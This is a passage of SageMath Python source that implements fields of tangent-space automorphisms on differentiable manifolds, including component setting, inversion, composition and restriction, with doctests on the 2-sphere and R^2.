sage: a.set_comp(e_uv)[0,0] = u+v
sage: a.set_comp(e_uv)[1,1] = u+v
sage: a.display(e_uv)
a = (u + v) d/du*du + (u + v) d/dv*dv
Setting the components in a new frame::
sage: e = V.vector_frame('e')
sage: a.set_comp(e)
2-indices components w.r.t. Vector frame (V, (e_0,e_1))
sage: a.set_comp(e)[0,1] = u*v
sage: a.set_comp(e)[1,0] = u*v
sage: a.display(e)
a = u*v e_0*e^1 + u*v e_1*e^0
Since the frames ``e`` and ``e_uv`` are defined on the same domain, the
components w.r.t. ``e_uv`` have been erased::
sage: a.display(c_uv.frame())
Traceback (most recent call last):
...
ValueError: no basis could be found for computing the components
in the Coordinate frame (V, (d/du,d/dv))
Since the identity map is a special element, its components cannot be
changed::
sage: id = M.tangent_identity_field()
sage: id.add_comp(e)[0,1] = u*v
Traceback (most recent call last):
...
AssertionError: the components of the identity map cannot be changed
"""
if self._is_identity:
raise AssertionError("the components of the identity map cannot be "
"changed")
return TensorField._set_comp_unsafe(self, basis=basis)
def add_comp(self, basis=None):
r"""
Return the components of ``self`` w.r.t. a given module basis for
assignment, keeping the components w.r.t. other bases.
To delete the components w.r.t. other bases, use the method
:meth:`set_comp` instead.
INPUT:
- ``basis`` -- (default: ``None``) basis in which the components are
defined; if none is provided, the components are assumed to refer to
the module's default basis
.. WARNING::
If the automorphism field has already components in other bases, it
is the user's responsibility to make sure that the components
to be added are consistent with them.
OUTPUT:
- components in the given basis, as an instance of the
class :class:`~sage.tensor.modules.comp.Components`;
if such components did not exist previously, they are created
EXAMPLES::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: e_uv = c_uv.frame()
sage: a= M.automorphism_field(name='a')
sage: a.add_comp(e_uv)
2-indices components w.r.t. Coordinate frame (V, (d/du,d/dv))
sage: a.add_comp(e_uv)[0,0] = u+v
sage: a.add_comp(e_uv)[1,1] = u+v
sage: a.display(e_uv)
a = (u + v) d/du*du + (u + v) d/dv*dv
Setting the components in a new frame::
sage: e = V.vector_frame('e')
sage: a.add_comp(e)
2-indices components w.r.t. Vector frame (V, (e_0,e_1))
sage: a.add_comp(e)[0,1] = u*v
sage: a.add_comp(e)[1,0] = u*v
sage: a.display(e)
a = u*v e_0*e^1 + u*v e_1*e^0
The components with respect to ``e_uv`` are kept::
sage: a.display(e_uv)
a = (u + v) d/du*du + (u + v) d/dv*dv
Since the identity map is a special element, its components cannot be
changed::
sage: id = M.tangent_identity_field()
sage: id.add_comp(e)[0,1] = u*v
Traceback (most recent call last):
...
AssertionError: the components of the identity map cannot be changed
"""
if self._is_identity:
raise AssertionError("the components of the identity map cannot be "
"changed")
return TensorField._add_comp_unsafe(self, basis=basis)
def _new_instance(self):
r"""
Create an instance of the same class as ``self`` on the same
vector field module.
TESTS::
sage: M = Manifold(5, 'M')
sage: a = M.automorphism_field(name='a')
sage: a._new_instance()
Field of tangent-space automorphisms on the 5-dimensional
differentiable manifold M
sage: a._new_instance().parent() is a.parent()
True
"""
return type(self)(self._vmodule)
def __call__(self, *arg):
r"""
Redefinition of
:meth:`~sage.manifolds.differentiable.tensorfield.TensorField.__call__`
to allow for a proper treatment of the identity map and of the call
with a single argument
TESTS:
Field of identity maps on the 2-sphere::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: xy_to_uv = c_xy.transition_map(c_uv, (x/(x^2+y^2), y/(x^2+y^2)),
....: intersection_name='W', restrictions1= x^2+y^2!=0,
....: restrictions2= u^2+v^2!=0)
sage: uv_to_xy = xy_to_uv.inverse()
sage: e_xy = c_xy.frame(); e_uv = c_uv.frame()
sage: w = M.vector_field({e_xy: [3, 1]}, name='w')
sage: w.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: z = M.one_form({e_xy: [-y, x]}, name='z')
sage: z.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: Id = M.tangent_identity_field()
sage: s = Id(w); s
Vector field w on the 2-dimensional differentiable manifold M
sage: s == w
True
sage: s = Id(z, w); s
Scalar field z(w) on the 2-dimensional differentiable manifold M
sage: s == z(w)
True
Field of automorphisms on the 2-sphere::
sage: a = M.automorphism_field({e_xy: [[-1, 0], [0, 1]]}, name='a')
sage: a.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
Call with a single argument::
sage: s = a(w); s
Vector field a(w) on the 2-dimensional differentiable manifold M
sage: s.display(e_xy)
a(w) = -3 d/dx + d/dy
sage: s.display(e_uv)
a(w) = (3*u^2 - 2*u*v - 3*v^2) d/du + (u^2 + 6*u*v - v^2) d/dv
sage: s.restrict(U) == a.restrict(U)(w.restrict(U))
True
sage: s.restrict(V) == a.restrict(V)(w.restrict(V))
True
sage: s.restrict(U) == a(w.restrict(U))
True
sage: s.restrict(U) == a.restrict(U)(w)
True
Call with two arguments::
sage: s = a(z, w); s
Scalar field a(z,w) on the 2-dimensional differentiable manifold M
sage: s.display()
a(z,w): M --> R
on U: (x, y) |--> x + 3*y
on V: (u, v) |--> (u + 3*v)/(u^2 + v^2)
sage: s.restrict(U) == a.restrict(U)(z.restrict(U), w.restrict(U))
True
sage: s.restrict(V) == a.restrict(V)(z.restrict(V), w.restrict(V))
True
sage: s.restrict(U) == a(z.restrict(U), w.restrict(U))
True
sage: s.restrict(U) == a(z, w.restrict(U))
True
"""
if self._is_identity:
if len(arg) == 1:
# The identity map acting as such, on a vector field:
vector = arg[0]
if vector._tensor_type != (1,0):
raise TypeError("the argument must be a vector field")
dom = self._domain.intersection(vector._domain)
return vector.restrict(dom)
elif len(arg) == 2:
# self acting as a type-(1,1) tensor on a pair
# (1-form, vector field), returning a scalar field:
oneform = arg[0]
vector = arg[1]
dom = self._domain.intersection(
oneform._domain).intersection(vector._domain)
return oneform.restrict(dom)(vector.restrict(dom))
else:
raise TypeError("wrong number of arguments")
# Generic case
if len(arg) == 1:
# The field of automorphisms acting on a vector field:
vector = arg[0]
if vector._tensor_type != (1,0):
raise TypeError("the argument must be a vector field")
dom = self._domain.intersection(vector._domain)
vector_dom = vector.restrict(dom)
if dom != self._domain:
return self.restrict(dom)(vector_dom)
resu = dom.vector_field()
if self._name is not None and vector._name is not None:
resu._name = self._name + "(" + vector._name + ")"
if self._latex_name is not None and vector._latex_name is not None:
resu._latex_name = self._latex_name + r"\left(" + \
vector._latex_name + r"\right)"
for sdom, automorph in self._restrictions.items():
resu._restrictions[sdom] = automorph(vector_dom.restrict(sdom))
return resu
# Case of 2 arguments:
return TensorField.__call__(self, *arg)
#### MultiplicativeGroupElement methods ####
def __invert__(self):
r"""
Return the inverse automorphism of ``self``.
EXAMPLES:
Inverse of a field of tangent-space automorphisms on a
non-parallelizable 2-dimensional manifold::
sage: M = Manifold(2, 'M')
sage: U = M.open_subset('U') ; V = M.open_subset('V')
sage: M.declare_union(U,V) # M is the union of U and V
sage: W = U.intersection(V)
sage: c_xy.<x,y> = U.chart() ; c_uv.<u,v> = V.chart()
sage: transf = c_xy.transition_map(c_uv, (x+y, x-y),
....: intersection_name='W', restrictions1= x>0, restrictions2= u+v>0)
sage: inv = transf.inverse()
sage: eU = c_xy.frame() ; eV = c_uv.frame()
sage: a = M.automorphism_field({eU: [[1,x], [0,2]]}, name='a')
sage: a.add_comp_by_continuation(eV, W, c_uv)
sage: ia = a.inverse() ; ia
Field of tangent-space automorphisms a^(-1) on the 2-dimensional
differentiable manifold M
sage: a[eU,:], ia[eU,:]
(
[1 x] [ 1 -1/2*x]
[0 2], [ 0 1/2]
)
sage: a[eV,:], ia[eV,:]
(
[ 1/4*u + 1/4*v + 3/2 -1/4*u - 1/4*v - 1/2]
[ 1/4*u + 1/4*v - 1/2 -1/4*u - 1/4*v + 3/2],
[-1/8*u - 1/8*v + 3/4 1/8*u + 1/8*v + 1/4]
[-1/8*u - 1/8*v + 1/4 1/8*u + 1/8*v + 3/4]
)
Let us check that ia is indeed the inverse of a::
sage: s = a.contract(ia)
sage: s[eU,:], s[eV,:]
(
[1 0] [1 0]
[0 1], [0 1]
)
sage: s = ia.contract(a)
sage: s[eU,:], s[eV,:]
(
[1 0] [1 0]
[0 1], [0 1]
)
The result is cached::
sage: a.inverse() is ia
True
Instead of ``inverse()``, one can use the power minus one to get the
inverse::
sage: ia is a^(-1)
True
or the operator ``~``::
sage: ia is ~a
True
"""
if self._is_identity:
return self
if self._inverse is None:
from sage.tensor.modules.format_utilities import is_atomic
if self._name is None:
inv_name = None
else:
if is_atomic(self._name, ['*']):
inv_name = self._name + '^(-1)'
else:
inv_name = '(' + self._name + ')^(-1)'
if self._latex_name is None:
inv_latex_name = None
else:
if is_atomic(self._latex_name, ['\\circ', '\\otimes']):
inv_latex_name = self._latex_name + r'^{-1}'
else:
inv_latex_name = r'\left(' + self._latex_name + \
r'\right)^{-1}'
self._inverse = self._vmodule.automorphism(name=inv_name,
latex_name=inv_latex_name)
for dom, rst in self._restrictions.items():
self._inverse._restrictions[dom] = rst.inverse()
return self._inverse
inverse = __invert__
def _mul_(self, other):
r"""
Automorphism composition.
This implements the group law of `GL(X(U,\Phi))`, with `X(U,\Phi)`
being the module of ``self``.
INPUT:
- ``other`` -- an automorphism of the same module as ``self``
OUTPUT:
- the automorphism resulting from the composition of ``other`` and
``self``
TESTS::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: xy_to_uv = c_xy.transition_map(c_uv, (x/(x^2+y^2), y/(x^2+y^2)),
....: intersection_name='W', restrictions1= x^2+y^2!=0,
....: restrictions2= u^2+v^2!=0)
sage: uv_to_xy = xy_to_uv.inverse()
sage: e_xy = c_xy.frame(); e_uv = c_uv.frame()
sage: a = M.automorphism_field({e_xy: [[-1, 0], [0, 1]]}, name='a')
sage: a.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: b = M.automorphism_field({e_uv: [[1, 0], [0, -2]]}, name='b')
sage: b.add_comp_by_continuation(e_xy, U.intersection(V), c_xy)
sage: s = a._mul_(b); s
Field of tangent-space automorphisms on the 2-dimensional
differentiable manifold M
sage: s.display(e_xy)
-(x^4 - 10*x^2*y^2 + y^4)/(x^4 + 2*x^2*y^2 + y^4) d/dx*dx
- 6*(x^3*y - x*y^3)/(x^4 + 2*x^2*y^2 + y^4) d/dx*dy
+ 6*(x^3*y - x*y^3)/(x^4 + 2*x^2*y^2 + y^4) d/dy*dx
- 2*(x^4 - 4*x^2*y^2 + y^4)/(x^4 + 2*x^2*y^2 + y^4) d/dy*dy
sage: s.display(e_uv)
-(u^4 - 6*u^2*v^2 + v^4)/(u^4 + 2*u^2*v^2 + v^4) d/du*du
+ 8*(u^3*v - u*v^3)/(u^4 + 2*u^2*v^2 + v^4) d/du*dv
- 4*(u^3*v - u*v^3)/(u^4 + 2*u^2*v^2 + v^4) d/dv*du
- 2*(u^4 - 6*u^2*v^2 + v^4)/(u^4 + 2*u^2*v^2 + v^4) d/dv*dv
sage: w = M.vector_field(name='w')
sage: w[e_xy, :] = [3, 1]
sage: w.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: s(w) == a(b(w)) # long time
True
"""
# No need for consistency check since self and other are guaranteed
# to have the same parent. In particular, they are defined on the same
# module.
#
# Special cases:
if self._is_identity:
return other
if other._is_identity:
return self
if other is self._inverse or self is other._inverse:
return self.parent().one()
# General case:
resu = type(self)(self._vmodule)
for dom in self._common_subdomains(other):
resu._restrictions[dom] = (self._restrictions[dom]
* other._restrictions[dom])
return resu
#### End of MultiplicativeGroupElement methods ####
def __mul__(self, other):
r"""
Redefinition of
:meth:`~sage.manifolds.differentiable.tensorfield.TensorField.__mul__`
so that ``*`` dispatches either to automorphism composition or
to the tensor product.
TESTS::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: xy_to_uv = c_xy.transition_map(c_uv, (x/(x^2+y^2), y/(x^2+y^2)),
....: intersection_name='W', restrictions1= x^2+y^2!=0,
....: restrictions2= u^2+v^2!=0)
sage: uv_to_xy = xy_to_uv.inverse()
sage: e_xy = c_xy.frame(); e_uv = c_uv.frame()
sage: a = M.automorphism_field(name='a')
sage: a[e_xy, :] = [[-1, 0], [0, 1]]
sage: a.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: b = M.automorphism_field(name='b')
sage: b[e_uv, :] = [[1, 0], [0, -2]]
sage: b.add_comp_by_continuation(e_xy, U.intersection(V), c_xy)
sage: w = M.vector_field(name='w')
sage: w[e_xy, :] = [3, 1]
sage: w.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: s = a.__mul__(b); s # automorphism composition
Field of tangent-space automorphisms on the 2-dimensional differentiable manifold M
sage: s(w) == a(b(w)) # long time
True
sage: s = a.__mul__(w); s # tensor product
Tensor field of type (2,1) on the 2-dimensional differentiable manifold M
"""
if isinstance(other, AutomorphismField):
return self._mul_(other) # general linear group law
else:
return TensorField.__mul__(self, other) # tensor product
def __imul__(self, other):
r"""
Redefinition of
:meth:`~sage.manifolds.differentiable.tensorfield.TensorField.__imul__`
TESTS::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: xy_to_uv = c_xy.transition_map(c_uv, (x/(x^2+y^2), y/(x^2+y^2)),
....: intersection_name='W', restrictions1= x^2+y^2!=0,
....: restrictions2= u^2+v^2!=0)
sage: uv_to_xy = xy_to_uv.inverse()
sage: e_xy = c_xy.frame(); e_uv = c_uv.frame()
sage: a = M.automorphism_field(name='a')
sage: a[e_xy, :] = [[-1, 0], [0, 1]]
sage: a.add_comp_by_continuation(e_uv, U.intersection(V), c_uv)
sage: b = M.automorphism_field(name='b')
sage: b[e_uv, :] = [[1, 0], [0, -2]]
sage: b.add_comp_by_continuation(e_xy, U.intersection(V), c_xy)
sage: a.__imul__(b)
Field of tangent-space automorphisms on the 2-dimensional differentiable manifold M
sage: s = a*b
sage: a *= b
sage: a == s
True
"""
return self.__mul__(other)
def restrict(self, subdomain, dest_map=None):
r"""
Return the restriction of ``self`` to some subdomain.
This is a redefinition of
:meth:`sage.manifolds.differentiable.tensorfield.TensorField.restrict`
to take into account the identity map.
INPUT:
- ``subdomain`` --
:class:`~sage.manifolds.differentiable.manifold.DifferentiableManifold`
open subset `V` of ``self._domain``
- ``dest_map`` -- (default: ``None``)
:class:`~sage.manifolds.differentiable.diff_map.DiffMap`;
destination map `\Phi:\ V \rightarrow N`, where `N` is a
subdomain of ``self._codomain``; if ``None``, the restriction
of ``self.base_module().destination_map()`` to `V` is used
OUTPUT:
- a :class:`AutomorphismField` representing the restriction
EXAMPLES:
Restrictions of an automorphism field on the 2-sphere::
sage: M = Manifold(2, 'S^2', start_index=1)
sage: U = M.open_subset('U') # the complement of the North pole
sage: stereoN.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: eN = stereoN.frame() # the associated vector frame
sage: V = M.open_subset('V') # the complement of the South pole
sage: stereoS.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: eS = stereoS.frame() # the associated vector frame
sage: transf = stereoN.transition_map(stereoS, (x/(x^2+y^2), y/(x^2+y^2)),
....: intersection_name='W',
....: restrictions1= x^2+y^2!=0,
....: restrictions2= u^2+v^2!=0)
sage: inv = transf.inverse() # transformation from stereoS to stereoN
sage: W = U.intersection(V) # the complement of the North and South poles
sage: stereoN_W = W.atlas()[0] # restriction of stereo. coord. from North pole to W
sage: stereoS_W = W.atlas()[1] # restriction of stereo. coord. from South pole to W
sage: eN_W = stereoN_W.frame() ; eS_W = stereoS_W.frame()
sage: a = M.automorphism_field({eN: [[1, atan(x^2+y^2)], [0,3]]},
....: name='a')
sage: a.add_comp_by_continuation(eS, W, chart=stereoS); a
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold S^2
sage: a.restrict(U)
Field of tangent-space automorphisms a on the Open subset U of the
2-dimensional differentiable manifold S^2
sage: a.restrict(U)[eN,:]
[ 1 arctan(x^2 + y^2)]
[ 0 3]
sage: a.restrict(V)
Field of tangent-space automorphisms a on the Open subset V of the
2-dimensional differentiable manifold S^2
sage: a.restrict(V)[eS,:]
[ (u^4 + 10*u^2*v^2 + v^4 + 2*(u^3*v - u*v^3)*arctan(1/(u^2 + v^2)))/(u^4 + 2*u^2*v^2 + v^4) -(4*u^3*v - 4*u*v^3 + (u^4 - 2*u^2*v^2 + v^4)*arctan(1/(u^2 + v^2)))/(u^4 + 2*u^2*v^2 + v^4)]
[ 4*(u^2*v^2*arctan(1/(u^2 + v^2)) - u^3*v + u*v^3)/(u^4 + 2*u^2*v^2 + v^4) (3*u^4 - 2*u^2*v^2 + 3*v^4 - 2*(u^3*v - u*v^3)*arctan(1/(u^2 + v^2)))/(u^4 + 2*u^2*v^2 + v^4)]
sage: a.restrict(W)
Field of tangent-space automorphisms a on the Open subset W of the
2-dimensional differentiable manifold S^2
sage: a.restrict(W)[eN_W,:]
[ 1 arctan(x^2 + y^2)]
[ 0 3]
Restrictions of the field of tangent-space identity maps::
sage: id = M.tangent_identity_field() ; id
Field of tangent-space identity maps on the 2-dimensional
differentiable manifold S^2
sage: id.restrict(U)
Field of tangent-space identity maps on the Open subset U of the
2-dimensional differentiable manifold S^2
sage: id.restrict(U)[eN,:]
[1 0]
[0 1]
sage: id.restrict(V)
Field of tangent-space identity maps on the Open subset V of the
2-dimensional differentiable manifold S^2
sage: id.restrict(V)[eS,:]
[1 0]
[0 1]
sage: id.restrict(W)[eN_W,:]
[1 0]
[0 1]
sage: id.restrict(W)[eS_W,:]
[1 0]
[0 1]
"""
if subdomain == self._domain:
return self
if subdomain not in self._restrictions:
if not self._is_identity:
return TensorField.restrict(self, subdomain, dest_map=dest_map)
# Special case of the identity map:
if not subdomain.is_subset(self._domain):
raise ValueError("the provided domain is not a subset of " +
"the field's domain")
if dest_map is None:
dest_map = self._vmodule._dest_map.restrict(subdomain)
elif not dest_map._codomain.is_subset(self._ambient_domain):
raise ValueError("the argument 'dest_map' is not compatible " +
"with the ambient domain of " +
"the {}".format(self))
smodule = subdomain.vector_field_module(dest_map=dest_map)
self._restrictions[subdomain] = smodule.identity_map()
return self._restrictions[subdomain]
#******************************************************************************
class AutomorphismFieldParal(FreeModuleAutomorphism, TensorFieldParal):
r"""
Field of tangent-space automorphisms with values on a parallelizable
manifold.
Given a differentiable manifold `U` and a differentiable map
`\Phi: U \rightarrow M` to a parallelizable manifold `M`,
a *field of tangent-space automorphisms along* `U` *with values on*
`M\supset\Phi(U)` is a differentiable map
.. MATH::
a:\ U \longrightarrow T^{(1,1)}M
(`T^{(1,1)}M` being the tensor bundle of type `(1,1)` over `M`) such
that
.. MATH::
\forall p \in U,\ a(p) \in \mathrm{Aut}(T_{\Phi(p)} M)
i.e. `a(p)` is an automorphism of the tangent space to `M` at the point
`\Phi(p)`.
The standard case of a field of tangent-space automorphisms *on* a
manifold corresponds to `U=M` and `\Phi = \mathrm{Id}_M`. Other
common cases are `\Phi` being an immersion and `\Phi` being a curve in `M`
(`U` is then an open interval of `\RR`).
.. NOTE::
If `M` is not parallelizable, the class :class:`AutomorphismField`
*must* be used instead.
INPUT:
- ``vector_field_module`` -- free module `\mathfrak{X}(U,\Phi)` of vector
fields along `U` with values on `M` via the map `\Phi`
- ``name`` -- (default: ``None``) name given to the field
- ``latex_name`` -- (default: ``None``) LaTeX symbol to denote the field;
if none is provided, the LaTeX symbol is set to ``name``
EXAMPLES:
A `\pi/3`-rotation in the Euclidean 2-plane::
sage: M = Manifold(2, 'R^2')
sage: c_xy.<x,y> = M.chart()
sage: rot = M.automorphism_field([[sqrt(3)/2, -1/2], [1/2, sqrt(3)/2]],
....: name='R'); rot
Field of tangent-space automorphisms R on the 2-dimensional
differentiable manifold R^2
sage: rot.parent()
General linear group of the Free module X(R^2) of vector fields on the
2-dimensional differentiable manifold R^2
The inverse automorphism is obtained via the method :meth:`inverse`::
sage: inv = rot.inverse() ; inv
Field of tangent-space automorphisms R^(-1) on the 2-dimensional
differentiable manifold R^2
sage: latex(inv)
R^{-1}
sage: inv[:]
[1/2*sqrt(3) 1/2]
[ -1/2 1/2*sqrt(3)]
sage: rot[:]
[1/2*sqrt(3) -1/2]
[ 1/2 1/2*sqrt(3)]
sage: inv[:] * rot[:] # check
[1 0]
[0 1]
Equivalently, one can use the power minus one to get the inverse::
sage: inv is rot^(-1)
True
or the operator ``~``::
sage: inv is ~rot
True
"""
def __init__(self, vector_field_module, name=None, latex_name=None):
r"""
Construct a field of tangent-space automorphisms.
TESTS:
Construction via ``parent.element_class``, and not via a direct call
to ``AutomorphismFieldParal``, to fit with the category framework::
sage: M = Manifold(2, 'M')
sage: X.<x,y> = M.chart() # makes M parallelizable
sage: XM = M.vector_field_module()
sage: GL = XM.general_linear_group()
sage: a = GL.element_class(XM, name='a'); a
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
sage: a[:] = [[1+x^2, x*y], [0, 1+y^2]]
sage: a.parent()
General linear group of the Free module X(M) of vector fields on
the 2-dimensional differentiable manifold M
sage: a.parent() is M.automorphism_field_group()
True
sage: TestSuite(a).run()
Construction of the field of identity maps::
sage: b = GL.one(); b
Field of tangent-space identity maps on the 2-dimensional
differentiable manifold M
sage: b[:]
[1 0]
[0 1]
sage: TestSuite(b).run()
"""
FreeModuleAutomorphism.__init__(self, vector_field_module,
name=name, latex_name=latex_name)
# TensorFieldParal attributes:
self._vmodule = vector_field_module
self._domain = vector_field_module._domain
self._ambient_domain = vector_field_module._ambient_domain
self._is_identity = False # a priori
# Initialization of derived quantities:
TensorFieldParal._init_derived(self)
def _repr_(self):
r"""
Return a string representation of ``self``.
TESTS::
sage: M = Manifold(2, 'M')
sage: X.<x,y> = M.chart()
sage: a = M.automorphism_field(name='a')
sage: a._repr_()
'Field of tangent-space automorphisms a on the 2-dimensional differentiable manifold M'
sage: repr(a) # indirect doctest
'Field of tangent-space automorphisms a on the 2-dimensional differentiable manifold M'
sage: a # indirect doctest
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
"""
description = "Field of tangent-space "
if self._is_identity:
description += "identity maps "
else:
description += "automorphisms "
if self._name is not None:
description += self._name + " "
return self._final_repr(description)
def _del_derived(self, del_restrictions=True):
r"""
Delete the derived quantities.
INPUT:
- ``del_restrictions`` -- (default: ``True``) determines whether the
restrictions of ``self`` to subdomains are deleted.
TESTS::
sage: M = Manifold(2, 'M')
sage: X.<x,y> = M.chart()
sage: a = M.automorphism_field(name='a')
sage: a._del_derived()
"""
# Delete the derived quantities pertaining to the mother classes:
FreeModuleAutomorphism._del_derived(self)
TensorFieldParal._del_derived(self, del_restrictions=del_restrictions)
# Method _new_instance() is defined in mother class FreeModuleAutomorphism
def __call__(self, *arg):
r"""
Redefinition of
:meth:`~sage.tensor.modules.free_module_automorphism.FreeModuleAutomorphism.__call__`
to allow for domain treatment.
TESTS::
sage: M = Manifold(2, 'M')
sage: X.<x,y> = M.chart()
sage: a = M.automorphism_field([[0, 1], [-1, 0]], name='a')
sage: v = M.vector_field(-y, x, name='v')
sage: z = M.one_form(1+y^2, x*y, name='z')
sage: s = a.__call__(v); s
Vector field a(v) on the 2-dimensional differentiable manifold M
sage: s.display()
a(v) = x d/dx + y d/dy
sage: s = a.__call__(z, v); s
Scalar field a(z,v) on the 2-dimensional differentiable manifold M
sage: s.display()
a(z,v): M --> R
(x, y) |--> 2*x*y^2 + x
sage: U = M.open_subset('U', coord_def={X: x>0})
sage: s = a.__call__(v.restrict(U)); s
Vector field a(v) on the Open subset U of the 2-dimensional
differentiable manifold M
sage: s = a.__call__(z.restrict(U), v); s
Scalar field a(z,v) on the Open subset U of the 2-dimensional
differentiable manifold M
sage: s.display()
a(z,v): U --> R
(x, y) |--> 2*x*y^2 + x
"""
if len(arg) == 1:
# the automorphism acting as such (map of a vector field to a
# vector field)
vector = arg[0]
dom = self._domain.intersection(vector._domain)
return FreeModuleAutomorphism.__call__(self.restrict(dom),
vector.restrict(dom))
elif len(arg) == 2:
# the automorphism acting as a type (1,1) tensor on a pair
# (1-form, vector field), returning a scalar field:
oneform = arg[0]
vector = arg[1]
dom = self._domain.intersection(oneform._domain).intersection(
vector._domain)
return FreeModuleAutomorphism.__call__(self.restrict(dom),
oneform.restrict(dom),
vector.restrict(dom))
else:
raise TypeError("wrong number of arguments")
def __invert__(self):
r"""
Return the inverse automorphism of ``self``.
EXAMPLES::
sage: M = Manifold(2, 'M')
sage: X.<x,y> = M.chart()
sage: a = M.automorphism_field([[0, 2], [-1, 0]], name='a')
sage: b = a.inverse(); b
Field of tangent-space automorphisms a^(-1) on the 2-dimensional
differentiable manifold M
sage: b[:]
[ 0 -1]
[1/2 0]
sage: a[:]
[ 0 2]
[-1 0]
The result is cached::
sage: a.inverse() is b
True
Instead of ``inverse()``, one can use the power minus one to get the
inverse::
sage: b is a^(-1)
True
or the operator ``~``::
sage: b is ~a
True
"""
from sage.matrix.constructor import matrix
from sage.tensor.modules.comp import Components
from sage.manifolds.differentiable.vectorframe import CoordFrame
if self._is_identity:
return self
if self._inverse is None:
from sage.tensor.modules.format_utilities import is_atomic
if self._name is None:
inv_name = None
else:
if is_atomic(self._name, ['*']):
inv_name = self._name + '^(-1)'
else:
inv_name = '(' + self._name + ')^(-1)'
if self._latex_name is None:
inv_latex_name = None
else:
if is_atomic(self._latex_name, ['\\circ', '\\otimes']):
inv_latex_name = self._latex_name + r'^{-1}'
else:
inv_latex_name = r'\left(' + self._latex_name + \
r'\right)^{-1}'
fmodule = self._fmodule
si = fmodule._sindex ; nsi = fmodule._rank + si
self._inverse = fmodule.automorphism(name=inv_name,
latex_name=inv_latex_name)
for frame in self._components:
if isinstance(frame, CoordFrame):
chart = frame._chart
else:
chart = self._domain._def_chart #!# to be improved
try:
# TODO: do the computation without the 'SR' enforcement
mat_self = matrix(
[[self.comp(frame)[i, j, chart].expr(method='SR')
for j in range(si, nsi)] for i in range(si, nsi)])
except (KeyError, ValueError):
continue
mat_inv = mat_self.inverse()
cinv = Components(fmodule._ring, frame, 2, start_index=si,
output_formatter=fmodule._output_formatter)
for i in range(si, nsi):
for j in range(si, nsi):
val = chart.simplify(mat_inv[i-si,j-si], method='SR')
cinv[i, j] = {chart: val}
self._inverse._components[frame] = cinv
return self._inverse
inverse = __invert__
def restrict(self, subdomain, dest_map=None):
r"""
Return the restriction of ``self`` to some subset of its domain.
If such restriction has not been defined yet, it is constructed here.
This is a redefinition of
:meth:`sage.manifolds.differentiable.tensorfield_paral.TensorFieldParal.restrict`
to take into account the identity map.
INPUT:
- ``subdomain`` --
:class:`~sage.manifolds.differentiable.manifold.DifferentiableManifold`;
open subset `V` of ``self._domain``
- ``dest_map`` -- (default: ``None``)
:class:`~sage.manifolds.differentiable.diff_map.DiffMap`
destination map `\Phi:\ V \rightarrow N`, where `N` is a subset of
``self._codomain``; if ``None``, the restriction of
``self.base_module().destination_map()`` to `V` is used
OUTPUT:
- a :class:`AutomorphismFieldParal` representing the restriction
EXAMPLES:
Restriction of an automorphism field defined on `\RR^2` to a disk::
sage: M = Manifold(2, 'R^2')
sage: c_cart.<x,y> = M.chart() # Cartesian coordinates on R^2
sage: D = M.open_subset('D') # the unit open disc
sage: c_cart_D = c_cart.restrict(D, x^2+y^2<1)
sage: a = M.automorphism_field([[1, x*y], [0, 3]], name='a'); a
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold R^2
sage: a.restrict(D)
Field of tangent-space automorphisms a on the Open subset D of the
2-dimensional differentiable manifold R^2
sage: a.restrict(D)[:]
[ 1 x*y]
[ 0 3]
Restriction to the disk of the field of tangent-space identity maps::
sage: id = M.tangent_identity_field() ; id
Field of tangent-space identity maps on the 2-dimensional
differentiable manifold R^2
sage: id.restrict(D)
Field of tangent-space identity maps on the Open subset D of the
2-dimensional differentiable manifold R^2
sage: id.restrict(D)[:]
[1 0]
[0 1]
sage: id.restrict(D) == D.tangent_identity_field()
True
"""
if subdomain == self._domain:
return self
if subdomain not in self._restrictions:
if not self._is_identity:
return TensorFieldParal.restrict(self, subdomain,
dest_map=dest_map)
# Special case of the identity map:
if not subdomain.is_subset(self._domain):
raise ValueError("the provided domain is not a subset of " +
"the field's domain.")
if dest_map is None:
dest_map = self._fmodule._dest_map.restrict(subdomain)
elif not dest_map._codomain.is_subset(self._ambient_domain):
raise ValueError("the argument 'dest_map' is not compatible " +
"with the ambient domain of " +
"the {}".format(self))
smodule = subdomain.vector_field_module(dest_map=dest_map)
self._restrictions[subdomain] = smodule.identity_map()
